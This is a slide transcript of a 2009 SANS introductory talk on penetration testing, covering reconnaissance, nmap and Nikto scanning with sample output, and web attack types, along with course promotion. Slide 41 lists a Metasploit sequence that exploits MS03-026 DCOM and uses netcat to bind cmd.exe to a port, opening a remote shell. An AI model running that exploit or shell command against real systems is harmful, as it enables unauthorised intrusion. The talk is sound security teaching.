Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Penetration Testing Basics


Published on

A 45 minute presentation originally presented at the SANS COINS event in Regina, SK in March of 2009

Published in: Technology
  • Login to see the comments

Penetration Testing Basics

  1. 1. Penetration Testing Basics A presentation of The Internet Storm Center, The SANS Institute and The GIAC Certification Program
  2. 2. About Me Rick Wanner B.Sc. I.S.P. <ul><li>Client Technology Manager, Security at SaskTel </li></ul><ul><li>Areas of expertise </li></ul><ul><ul><li>Secure Network Architecture, Penetration Testing </li></ul></ul><ul><ul><li>IDS, Policy Development and compliance </li></ul></ul><ul><li>Masters Student at STI (SANS Technology Institute) </li></ul><ul><li>Handler at the Internet Storm Center ( </li></ul><ul><li>Independent contractor/Volunteer with SANS/GIAC </li></ul><ul><li>[email_address] </li></ul>
  3. 3. Presentation Overview <ul><li>Internet Storm Centre </li></ul><ul><li>SANS/GIAC Mini-Briefing </li></ul><ul><li>Security Mitigation Strategies </li></ul><ul><ul><li>Penetration Testing </li></ul></ul>
  4. 4. The Internet Storm Center <ul><li>The Internet Storm Center acts as a distributed early warning system for the Internet </li></ul><ul><li>The ISC acts as an intermediary with ISPs worldwide. </li></ul><ul><li>The ISC is composed of approximately 40 volunteer handlers which coordinate a group of volunteer intrusion analysts and malware specialists. </li></ul><ul><li>Daily blog/diary published at </li></ul><ul><li>Sponsored by the SANS Institute. </li></ul>
  5. 5. We want your logs! <ul><li>The ISCs principal inputs come from and Internet users </li></ul><ul><li>All logs are scrubbed before they are submitted. </li></ul>
  6. 6. SANS Training and GIAC Certifications <ul><li>SANS Institute is the leading training organization for system administration, audit, network, security and security management. </li></ul><ul><li>GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job. </li></ul>
  7. 7. Today’s Cyber Threats <ul><li>Cyber threats have certainly changed since Al Gore invented the internet. </li></ul><ul><li>What started off as an innocuous invention by ARPANET and supported by the U.S. Department of Defense, is now a significant vehicle for conducting business, shopping, banking, researching, communicating, and maintaining vital corporate information </li></ul><ul><li>Unfortunately it’s also a haven for hackers and intrusive malicious code. </li></ul>
  8. 8. The Internet <ul><li>The Internet is a community of individuals with its good neighbourhoods and bad neighborhoods. </li></ul><ul><li>In this community the bad neighborhoods are only separated from the good neighbourhoods by at most 150 milliseconds. </li></ul>
  9. 9. The Need for Information Security <ul><li>While you are working hard to protect your organization’s critical information and systems, there are others out there who want to compromise it. </li></ul><ul><li>Learning the appropriate actions to secure this information not only benefits your employer, clients, and stockholders, it benefits you. </li></ul><ul><li>In this industry, you don’t want to be the one who learned the hard way. </li></ul>
  10. 10. Security Outlook <ul><li>As users get more sophisticated, so do the bad guys. </li></ul><ul><li>A CA, Inc. report issued on January 29, 2007 stated that: </li></ul><ul><li>In 2006, trojans accounted for 62% of all malware; worms 24%; and viruses and other types of malware accounted for the remaining 13%. </li></ul><ul><li>CA, Inc predicts that attackers will use blended threats to steal private information and perpetrate other attacks </li></ul><ul><ul><li>Phishers are getting smarter </li></ul></ul><ul><ul><li>Spam will increase </li></ul></ul><ul><ul><li>Targeted attacks will increase </li></ul></ul><ul><ul><li>A rise in the use of kernel rootkits </li></ul></ul><ul><ul><li>Increased exploitation of browser and application vulnerabilities </li></ul></ul><ul><ul><li>Typo-squatting on search engines will increase </li></ul></ul><ul><ul><li>Attacks are increasingly sophisticated. </li></ul></ul>
  11. 11. Penetration Testing <ul><li>Penetration testing is discovering vulnerabilities in your networks, systems, applications and data before the bad guys do. </li></ul><ul><li>Penetration testing simulates the generalized attack methodology. </li></ul>
  12. 12. Generalized Attack Methodology <ul><li>Reconnaissance </li></ul><ul><li>Scanning </li></ul><ul><li>Gaining Access </li></ul><ul><li>Maintaining Access </li></ul><ul><li>Covering Tracks </li></ul>
  13. 13. Penetration Testing Method <ul><li>Preparation </li></ul><ul><li>Reconnaissance </li></ul><ul><li>Scanning </li></ul><ul><li>Exploitation </li></ul><ul><li>Analysis </li></ul><ul><li>Reporting </li></ul>
  14. 14. Preparation <ul><li>Define the parameters of the test. </li></ul><ul><ul><li>Objectives </li></ul></ul><ul><ul><li>Scope </li></ul></ul><ul><ul><li>Roles and responsibilities </li></ul></ul><ul><ul><li>Limitations </li></ul></ul><ul><ul><li>Success factors </li></ul></ul><ul><ul><li>Timeline </li></ul></ul><ul><ul><li>Documented Permission </li></ul></ul>
  15. 15. Reconnaissance <ul><li>Reconnaissance determines…”What can a potential attacker learn about your company?” </li></ul><ul><li>Utilizes publicly available information. </li></ul>
  16. 16. Reconnaissance (2) <ul><li>Some sources of information: </li></ul><ul><ul><li>Search Engines </li></ul></ul><ul><ul><li>Websites </li></ul></ul><ul><ul><li>Registrars </li></ul></ul><ul><ul><li>SEC </li></ul></ul><ul><ul><li>Recruiting sites </li></ul></ul><ul><ul><li> </li></ul></ul>
  17. 17. Reconnaissance (3) - Netcraft
  18. 18. Reconnaissance (4) - Netcraft
  19. 19. Scanning <ul><li>Now we know where to look, let’s dig in a little deeper. </li></ul><ul><li>Generally you are going to use two types of scanners, port scanners, and vulnerability scanners. </li></ul><ul><li>The hackers choice: </li></ul><ul><ul><li>Nmap </li></ul></ul><ul><ul><li>Nessus </li></ul></ul>
  20. 20. Nmap <ul><li>Nmap – open sourced port scanner </li></ul><ul><li>Usually start with discovery scans and progress to targeted scans. </li></ul><ul><li>Runs on Windows and *nix. </li></ul><ul><li>Available from </li></ul>
  21. 21. Nmap Book
  22. 22. Nmap - Reconaissance <ul><li>nmap –sL <Address> </li></ul><ul><li>nmap –sL </li></ul><ul><li>nmap –sL </li></ul>
  23. 23. Nmap - Discovery <ul><li>nmap –F <Address> </li></ul><ul><li>nmap –F </li></ul><ul><li>nmap -top-ports 20 <address> </li></ul><ul><li>nmap -top-ports 20 </li></ul>
  24. 24. Nmap - Targeted <ul><li>nmap -F –A <address> </li></ul><ul><li>nmap -F –A </li></ul>
  25. 25. Vulnerability Scanner <ul><li>Nessus –open sourced VA scanner </li></ul><ul><li>Vulnerability feed costs money. </li></ul>
  26. 26. Commercial Vulnerability Scanners Rapid7 NeXpose GFI LANguard eEye Retina Network
  27. 27. Application Attacks <ul><li>Now we have all these layers of protection. Are you still vulnerable? </li></ul><ul><li>The fact is that you can’t deny what you must permit. </li></ul><ul><li>What about application level attacks? </li></ul>
  28. 28. Cross-Site Scripting <ul><li>Allows code injection by malicious web users into the web pages viewed by other users. </li></ul><ul><li>Root cause - lack of input filtering and validation </li></ul><ul><li>Permits attacker to execute arbitrary scripts on the browser </li></ul>
  29. 29. Yahoo's HotJobs site vulnerable to cross-site scripting attack Dan Kaplan - October 27 2008 <ul><li>Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could be exploited to steal authentication cookies. The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog  post on Sunday. &quot;The script steals the authentication cookies that are sent for the domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details,&quot; Mutton wrote. The pilfered credentials could enable the attackers access to the victims' Yahoo acounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said. &quot;Simply visiting the malign URLs on can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this,&quot; Mutton wrote. &quot;Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised.&quot; </li></ul>
  30. 30. Cross-Site Request Forgery (XSRF) <ul><li>Unauthorized commands are transmitted from a user that the website trusts. </li></ul><ul><li>Exploitation of an existing web session. </li></ul><ul><li>Embedded code causes unauthorized actions </li></ul>
  31. 31. SQL Injection <ul><li>SQL statements are injected into user input to see if a response is returned. </li></ul><ul><li>Results </li></ul><ul><ul><li>Authentication Bypass </li></ul></ul><ul><ul><li>Unauthorized data access </li></ul></ul>
  32. 32. Preventing Web Application Attacks <ul><li>Every input should be validated! </li></ul><ul><li>“ Suspicion Breeds Confidence” </li></ul><ul><ul><li>Test it! </li></ul></ul>
  33. 33. Nikto <ul><li>Open source Linux based web application scanner </li></ul><ul><li>Available at </li></ul>
  34. 34. Nikto (2) <ul><li>Basic Scan </li></ul><ul><ul><li>perl –h <host> </li></ul></ul><ul><ul><li>perl –h </li></ul></ul><ul><li>Multiple ports </li></ul><ul><ul><li>perl –h –p 80,88,443 </li></ul></ul>
  35. 35. Nikto – Simple Scan <ul><li>[root@rwanner nikto]# ./ -h localhost </li></ul><ul><li>- Nikto v2.03/2.04 </li></ul><ul><li>--------------------------------------------------------------------------- </li></ul><ul><li>+ Target IP: </li></ul><ul><li>+ Target Hostname: localhost </li></ul><ul><li>+ Target Port: 80 </li></ul><ul><li>+ Start Time: 2008-10-27 21:53:47 </li></ul><ul><li>--------------------------------------------------------------------------- </li></ul><ul><li>+ Server: Apache/2.2.6 (Fedora) </li></ul><ul><li>- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE </li></ul><ul><li>+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST. </li></ul><ul><li>+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current. </li></ul><ul><li>+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). </li></ul><ul><li>+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See for details </li></ul><ul><li>+ OSVDB-3092: GET /manual/ : Web server manual found. </li></ul><ul><li>+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons </li></ul><ul><li>+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images </li></ul><ul><li>+ OSVDB-3233: GET /icons/README : Apache default file found. </li></ul><ul><li>+ 3577 items checked: 9 item(s) reported on remote host </li></ul><ul><li>+ End Time: 2008-10-27 21:54:28 (41 seconds) </li></ul>
  36. 36. Nikto (3) <ul><li>Multiple hosts </li></ul><ul><ul><li>perl –h <filename> </li></ul></ul><ul><ul><li>perl –h hosts.txt </li></ul></ul><ul><li>Hosts file </li></ul><ul><ul><li> </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li>,443 </li></ul></ul>
  37. 37. Nikto – Multiple Hosts Scan <ul><li>]# ./ -h hosts.txt </li></ul><ul><li>- Nikto v2.03/2.04 </li></ul><ul><li>--------------------------------------------------------------------------- </li></ul><ul><li>+ Target IP: </li></ul><ul><li>+ Target Hostname: </li></ul><ul><li>+ Target Port: 443 </li></ul><ul><li>--------------------------------------------------------------------------- </li></ul><ul><li>+ SSL Info: Ciphers: DES-CBC3-SHA </li></ul><ul><li>Info: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/ </li></ul><ul><li>Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys, LLC/OU=Division/CN=Linksys/ </li></ul><ul><li>+ Start Time: 2008-10-28 21:16:37 </li></ul><ul><li>--------------------------------------------------------------------------- </li></ul><ul><li>+ Server: No banner retrieved </li></ul>
  38. 38. Commercial Web Scanners IBM Rational AppScan HP Webinspect Cenzic Hailstorm
  39. 39. Exploitation <ul><li>Once you identify a potential vulnerability you have choices: </li></ul><ul><ul><li>Can use individual exploits…available via the Internet </li></ul></ul><ul><ul><li>Can use pre-built exploitation frameworks. </li></ul></ul><ul><li>The most popular exploitation framework is Metasploit. </li></ul><ul><ul><li>Available for Windows or Linux </li></ul></ul><ul><ul><li>Available at </li></ul></ul>
  40. 40. Metasploit <ul><li>3 primary components </li></ul><ul><ul><li>Exploit </li></ul></ul><ul><ul><ul><li>Stack/Heap based buffer overflow </li></ul></ul></ul><ul><ul><ul><li>Insecure coding </li></ul></ul></ul><ul><ul><ul><li>PHP vulnerability, IIS Unicode, SQL injection, etc. </li></ul></ul></ul><ul><ul><li>NOP sled (optional - exploit dependent) </li></ul></ul><ul><ul><li>Payload </li></ul></ul><ul><ul><ul><li>Shellcode </li></ul></ul></ul><ul><ul><ul><li>Encoders </li></ul></ul></ul><ul><ul><ul><li>Other (exploit dependent) </li></ul></ul></ul>
  41. 41. Metasploit <ul><li>#./msfconsole  start Metasploit </li></ul><ul><li>msf > use windows/dcerpc/ms03_026_dcom </li></ul><ul><li>msf > setg PAYLOAD windows/exec </li></ul><ul><li>msf > setg CMD nc –L –p 80 cmd.exe </li></ul><ul><li>msf > setg RHOST </li></ul><ul><li>msf > exploit </li></ul>
  42. 42. Exploitation Demo <ul><li>Patching and Configuration </li></ul><ul><ul><li>Lacking patch management procedures </li></ul></ul><ul><ul><li>Single inbound port open through firewall </li></ul></ul><ul><li>Results </li></ul><ul><ul><li>Simple remote exploitation </li></ul></ul><ul><ul><li>Worm characteristics </li></ul></ul><ul><ul><li>Can be used to bypass firewalls </li></ul></ul>
  43. 43. Commercial Tools <ul><li>Core Impact </li></ul>
  44. 44. Analysis <ul><li>When you finish you will have a mountain of data to analyze. </li></ul><ul><li>Break it down by a risk based approach. </li></ul>
  45. 45. Reporting <ul><li>Base your report on risk. </li></ul><ul><li>Write it so your senior executives can understand. </li></ul><ul><li>Provide recommendation based on standards or best practices. </li></ul><ul><li>Keep the Executive summary short. </li></ul><ul><li>Stay away from FUD! </li></ul>
  46. 46. Presentation Summary <ul><li>Support the Internet Storm Center (ISC) </li></ul><ul><li>SANS is the best! </li></ul><ul><li>Test your servers and applications... before the bad guys do! </li></ul>
  47. 47. Special Tuition Offer Because you attended this session, we are offering you 10% discount on tuition for our upcoming Critical infrastructure course in Calgary
  48. 48. COMMUNITY SANS <ul><li>For details on this special offer, please contact for further information. </li></ul>
  49. 49. Community SANS in Calgary <ul><li>Critical Infrastructure Protection </li></ul><ul><li>in CALGARY </li></ul><ul><li>Monday, June 15, 2009 – </li></ul><ul><li>Wednesday, June 17, 2009 </li></ul>Please use: Discount Code: COINS10 Discount : 10%
  50. 50. COMMUNITY SANS in REGINA <ul><li>We are coming back to Regina again next month!!! </li></ul><ul><li>April 6-8, 2009 </li></ul><ul><li>Regina Inn – </li></ul><ul><li>Hotel & Conference Centre </li></ul><ul><li>Security 557 - </li></ul><ul><li>“ Virtualization Security and Operations ” </li></ul>
  51. 51. One CPE Credit <ul><li>You will receive one CPE credit for attending this evening. </li></ul>
  52. 52. THANK YOU!!!! <ul><li>This evening was brought to on behalf of our COMMUNITY OF INTEREST IN NETWORK SECURITY (COINS) program. </li></ul><ul><li>Thank you for </li></ul><ul><li>joining us tonight! </li></ul>
  53. 53. SANS/GIAC Overview
  54. 54. SANS Training and GIAC Certifications <ul><li>SANS Institute is the leading training organization for system, audit, network, and security. </li></ul><ul><li>GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job. </li></ul>
  55. 55. SANS and GIAC Guiding Principles <ul><li>Education </li></ul><ul><ul><li>Current, Evolving and Proven Material </li></ul></ul><ul><ul><li>Certifications that prove you have the knowledge and skills to get the job done </li></ul></ul><ul><li>Hands-On </li></ul><ul><ul><li>Hands-on training conducted by instructors who are experts in their fields </li></ul></ul><ul><ul><li>Testing process that evaluates hands-on capabilities </li></ul></ul><ul><li>Community </li></ul><ul><ul><li>Listening and learning to the community’s needs </li></ul></ul><ul><ul><li>Giving vital knowledge back to the community </li></ul></ul>
  56. 56. How SANS and GIAC Are Different From Other Training/Certifications <ul><li>SANS and GIAC constantly update course and certification information to keep you on top of current threats and vulnerabilities. </li></ul><ul><li>We use real-world, hands-on scenarios. </li></ul><ul><li>While tools are an important part of IT security, we teach you and validate actual skills, so you don’t have to solely rely on the performance of a tool. </li></ul><ul><li>The SANS Promise - You will be able to apply our information security training the day you get back to the office. </li></ul>
  57. 57. GIAC Certification <ul><ul><li>GIAC Silver Certifications </li></ul></ul><ul><ul><li>Multiple choice exams only </li></ul></ul><ul><li>GIAC Gold Certifications </li></ul><ul><li>Plus a written technical report </li></ul><ul><ul><li>GIAC Platinum Series </li></ul></ul><ul><ul><li>Highest certification level </li></ul></ul>
  58. 58. Top 3 Reasons to Earn Your GIAC Certification <ul><ul><li>Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills </li></ul></ul><ul><ul><li>GIAC certifications help IT Security Professionals get promoted faster and earn more money </li></ul></ul><ul><ul><li>GIAC certification reinforces and affirms the 'hands on' knowledge you possess </li></ul></ul>
  59. 59. What Certified People Say? <ul><ul><li>&quot;The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin.&quot; </li></ul></ul><ul><ul><li>J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center </li></ul></ul><ul><li>&quot;The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations.“ Matt Carpenter, Enterprise Information Systems </li></ul><ul><ul><li>GIAC certifications help IT Security Professionals get promoted faster and earn more money… </li></ul></ul>
  60. 60. GIAC Certifications <ul><li>GSEC - Security Essentials </li></ul><ul><li>GCFW - Firewall Analyst </li></ul><ul><li>GCIA - Intrusion Analyst </li></ul><ul><li>GCIH - Incident Handler </li></ul><ul><li>GCFA - Forensics Analyst </li></ul><ul><li>GCUX - Unix Security </li></ul><ul><li>GCWN - Windows Security </li></ul><ul><li>GNET - . NET </li></ul><ul><li>GSOC - Securing Oracle </li></ul><ul><li>GSSP-JAVA - Secure Coding </li></ul><ul><li>GSSP-C - Secure Coding </li></ul><ul><li>GISF - Information Security Fundamentals </li></ul><ul><li>GSAE - Security Audit Essentials </li></ul><ul><li>GSLC - Security Leadership </li></ul><ul><li>GSNA - System & Network Auditor </li></ul><ul><li>G7799 - ISO 17799/27001 </li></ul><ul><li>GISP - Information Security Professional </li></ul><ul><li>GCIM - Incident Manager </li></ul><ul><li>GAWN - Auditing Wireless Networks </li></ul><ul><li>GREM - Reverse-Engineering Malware </li></ul><ul><li>GPEN - Penetration Tester </li></ul><ul><li>GCPM - IT Project Management </li></ul>For a complete list of GIAC Certifications
  61. 61. Free Resources <ul><li>SANS and GIAC have a variety of free resources readily available at and </li></ul><ul><li>Here’s a sample of what we offer: </li></ul><ul><li>Internet Storm Center </li></ul><ul><li>SANS reading room - </li></ul><ul><li>Top 15 Malicious Spyware Actions </li></ul><ul><li>SANS Security Policy Samples </li></ul><ul><li>The Internet Guide to Popular Resources on Information Security </li></ul><ul><li>FAQ’s </li></ul><ul><li>SCORE </li></ul><ul><li>Security Tool White Papers and GIAC Gold Papers </li></ul><ul><li>Glossary of Security Terms </li></ul>
  62. 62. Thank You! Questions: [email_address] [email_address]